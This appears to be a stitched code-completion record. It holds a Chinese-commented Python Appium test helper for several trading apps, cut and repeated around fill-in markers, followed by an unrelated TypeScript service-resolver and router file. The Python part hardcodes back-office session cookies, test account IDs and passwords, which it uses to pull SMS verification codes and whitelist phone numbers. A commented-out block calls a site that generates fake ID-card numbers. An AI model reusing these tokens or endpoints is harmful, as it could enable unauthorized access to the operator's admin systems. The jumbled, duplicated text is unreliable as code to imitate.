'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
}
response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#添加白名單API
def White_List_API(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/whitelists/edit"
payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
'Content-Type': 'application/json'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
print('添加白名單結果為:',data['msg'])
else:
request_url = "https://office.cf139.com/whitelists/edit"
seconds = str(int(time.time()))
#payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
headers = {
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/whitelist/index',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
}
response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,accou | nt_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv)
| identifier_body | |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
#=========UAT/PRD切換測試需更改之參數========
# 指定OS
OS = 'Windows'
#UAT
#package_name = 'com.szoc.zb.cs'
#PRD
#package_name = 'com.gwtsz.gts2.cf'
#cf2
package_name = 'com.gwtsz.gts2.cf2'
#cf3
#package_name = 'com.gwtsz.gts2.cf3'
#專案目錄
dir_path = os.path.dirname(os.path.realpath(__file__))
#包為PRD
if(package_name == 'com.gwtsz.gts2.cf'):
#指定apk路徑
apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '创富CFD V_1.8.5'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81135805'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為UAT
elif(package_name == 'com.szoc.zb.cs'):
#指定apk路徑
apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = 'ISTONE V_1.8.3'
#關於創富(用於關於創富檢查)
about_us_expect = '关于神龙科技'
#登入帳戶
main_user_id = '81018322'
main_user_demo_id = '11002074'
main_user_password = 'abc123'
#包為CF2
elif(package_name == 'com.gwtsz.gts2.cf2'):
#指定apk路徑
apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為CF3
else:
# 指定apk路徑
apk_url = dir_path + 'release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
# 應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '白银交易平台 V_1.8.5'
# 關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
# 登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#=========UAT/PRD切換測試需更改之參數========
account_csv = '帳號列表.csv'
#指定舊版本apk路徑(覆蓋安裝測試)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
#指定裝置、版本、安裝包
#每次開啟不重置app
desired_caps = {
#'platformName':'Android',
#'platformVersion':'5.1.1',
#'deviceName':'Android Emulator',
'platformName':'Android',
'platformVersion':'10',
'deviceName':'Mi 9t',
'appPackage': package_name,
'appActivity':'gw.com.android.ui.WelcomeActivity',
'newCommandTimeout':6000,
'noReset':True
}
#每次開啟重置app
desired_caps_reset = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
'appPackage':desired_caps['appPackage'],
'appActivity':desired_caps['appActivity'],
'newCommandTimeout':desired_caps['newCommandTimeout'],
'noReset':False
}
#不啟動app,開桌面
desired_install = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
#行情tab
def click_quotation(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.w | id.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
#隨機產生密碼
def generate_random_password(self):
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvwxyz0123456789'
length = len(chars) - 1
random_password = ''
for i in range(random.randint(6,8)):
random_password+=chars[random.randint(0,length)]
random_password+=str(random.randint(0,9))
return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
#獲取驗證碼API
def register_demo_account_api(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
'Content-Type': 'text/plain'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
#回傳驗證碼
return data['data']
else:
request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Connection': 'close',
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/validater/validateNo',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
}
response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#添加白名單API
def White_List_API(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/whitelists/edit"
payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
'Content-Type': 'application/json'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
print('添加白名單結果為:',data['msg'])
else:
request_url = "https://office.cf139.com/whitelists/edit"
seconds = str(int(time.time()))
#payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
headers = {
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/whitelist/index',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
}
response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv)
| idget.FrameLayout/andro | identifier_name |
app.ts |
import {
d,
o,
MaybeObservable,
Observable,
ObserverFunction,
VirtualHolder,
NodeCreatorFn
} from 'domic'
export type Instantiator<T> = new (...a: any[]) => T
/**
*
*/
export class ServiceConfig {
service: Instantiator<Service>
params: any[] = []
constructor(service: Instantiator<Service>, ...params: any[]) {
this.service = service
this.params = params
}
}
/**
*
*/
class Redirect extends Error {
screen: Screen
configs: ServiceConfig[]
constructor(screen: Screen, configs: ServiceConfig[]) {
super('redirecting')
this.screen = screen
this.configs = configs
}
}
export type ConfigMap = Map<Instantiator<Service>, ServiceConfig>
export type ServiceMap = Map<Instantiator<Service>, Service>
/**
* Resolver helps in service instanciation and destroy
*/
export class Resolver {
services: ServiceMap
configs: ConfigMap
old_resolver: Resolver | null
app: App
constructor(app: App) {
this.app = app
}
/**
* For a given service type, return an instance, creating it
* if it doesn't exist, using a matching ServiceConfig if provided.
*
* If this is not the first time the service is instanciated, try
* to reuse a previous instance as long as its config or any of its
* dependencies have not changed.
*
* @param type: A Service type
* @returns: The matching service instance
*/
require<S extends Service>(type: Instantiator<S>): S {
let service = this.services.get(type) as S
if (service) return service
let conf = this.configs.get(type)
if (conf) {
// we ignore previous service, since we are being given a new
// configuration for it.
service = new type(this.app, ...conf.params)
} else {
// try to get an older version of the service since possibly its
// configuration has not changed.
service = this.old_resolver ? this.old_resolver.services.get(type) as S : null
conf = this.old_resolver ? this.old_resolver.configs.get(type) : null
if (service) {
// browse the dependencies and check that they haven't changed themselves.
// if require() sends a different instance of the dependency, this service
// is not reused.
for (let d of service._dependencies) {
let nd = this.require((d as any).constructor)
if (d !== nd)
service = null
}
}
if (!service) {
// no config, no previously instanciated service, so
// we just create one without arguments, reusing its config if it had one previously.
let params = conf ? conf.params : []
service = new type(this.app, ...params)
}
// pull the old configuration into the new map to keep track of it.
if (conf) this.configs.set(type, conf)
}
this.services.set(type, service)
return service
}
/**
* Destroy services that won't be used anymore by calling their destroy()
* method.
*/
commit(): void {
// Destroy old service versions.
if (this.old_resolver) |
// free the old resolver so it can be garbage collected.
this.old_resolver = null
}
/**
* Call all the init() of the services.
*
* @returns: A promise of when the initiation will be done.
*/
init(): Promise<any> {
let promises: Promise<any>[] = []
this.services.forEach(serv => {
// Setup the promise chain ; basically, getInitPromise gets all the dependencies promises
// and will make their init() method wait on them.
promises.push(serv.getInitPromise(serv._dependencies.map(d => d.getInitPromise())))
})
return Promise.all(promises)
}
/**
* Prepare the resolver for a new transition.
*/
prepare(
screen: Screen,
old_resolver: Resolver,
configs: ServiceConfig[]
): void {
// Setup the config map
this.configs = new Map() as ConfigMap
this.services = new Map() as ServiceMap
this.old_resolver = old_resolver
configs.forEach(conf => this.configs.set(conf.service, conf))
screen.deps.forEach(dep => this.require(dep))
}
}
export type State = {screen: Screen, config: Map<Instantiator<Service>, ServiceConfig>}
/**
* Application
*/
export class App {
public activating = false
public current_screen: Screen = null
public resolver: Resolver = null
public services: Map<Instantiator<Service>, Service>
public config: Map<Instantiator<Service>, ServiceConfig>
public state_stack: State[] = []
public current_state_index: number = -1
public o_services: Observable<ServiceMap> = o(null)
constructor() {
window.addEventListener('popstate', ev => {
this.popstate(ev.state.state_index)
})
}
block(name: string): Block {
var block: Block = function _block(...a: any[]): View {
let v = new View(this)
let fn = a[a.length - 1]
let services = a.slice(0, a.length - 1)
v.fn = fn
v.deps = services
v.block = block
v.app = block.app
return v
} as Block
block.app = this
block._name = name
return block
// return new Block(this)
}
screen(name: string, ...views: View[]): Screen {
let screen = new Screen(this, name)
screen.define(...views)
return screen
}
/**
*
*/
go(screen: Screen, ...configs: ServiceConfig[]): Promise<any> {
if (this.activating)
// Should do some kind of redirect here ?
return Promise.reject(new Redirect(screen, configs))
try {
this.activating = true
let prev_resolver = this.resolver
this.resolver = new Resolver(this)
this.resolver.prepare(screen, prev_resolver, configs)
// wait on all the promises before transitionning to a new state.
return this.resolver.init().then(res => {
this.resolver.commit()
this.config = this.resolver.configs
this.services = this.resolver.services
this.current_screen = screen as Screen
this.activating = false
this.o_services.set(this.services)
// Replace state stack to remove all possible forward occurences...
// XXX : forward is bugged ?
this.state_stack = this.state_stack.slice(0, this.current_state_index + 1)
// Push
this.state_stack.push({
screen: this.current_screen,
config: this.config
})
this.current_state_index = this.state_stack.length - 1
window.history.pushState({state_index: this.state_stack.length - 1}, null)
}).catch(err => {
// cancel activation.
this.resolver = prev_resolver
this.activating = false
if (err.message === 'redirecting' && err.screen)
return this.go(err.screen, ...err.configs)
return Promise.reject(err)
})
} catch (err) {
this.activating = false
return Promise.reject(err)
}
}
async popstate(idx: number) {
if (this.state_stack.length === 0) return Promise.reject('no previous screen')
let state = this.state_stack[idx]
let configs: ServiceConfig[] = []
state.config.forEach(value => configs.push(value))
try {
await this.go(state.screen, ...configs)
} catch (e) {
console.error(e)
}
}
/**
*
*/
require<S extends Service>(type: Instantiator<S>): S {
return this.resolver.require(type)
}
}
/**
* A sample app, usable by default
*/
export const app = new App
export interface HasConfig<C> {
new (...a: any[]): InstanceHasConfig<C>
}
export interface InstanceHasConfig<C> extends Service {
init(c: C): any
}
/**
*
*/
export class Service {
app: App
ondestroy: (() => any)[] = []
_dependencies: Array<Service> = []
protected _initPromise: Promise<any>
constructor(app: App) {
this.app = app
}
// static with<Z, A, B, C, D, E, F>(this: new (app: App, a: A, b: B, c: C, d: D, e: E, f: F) => Z, a: A, b: B, c: C, d: D, e: E, f: F): ServiceConfig;
// static with<Z, A, B, C, D, E>(this: new (app: App, a: A, b: B, c: C, d: D, e: E) => Z, a: A, b: B, c: C, d: D, e: E): ServiceConfig;
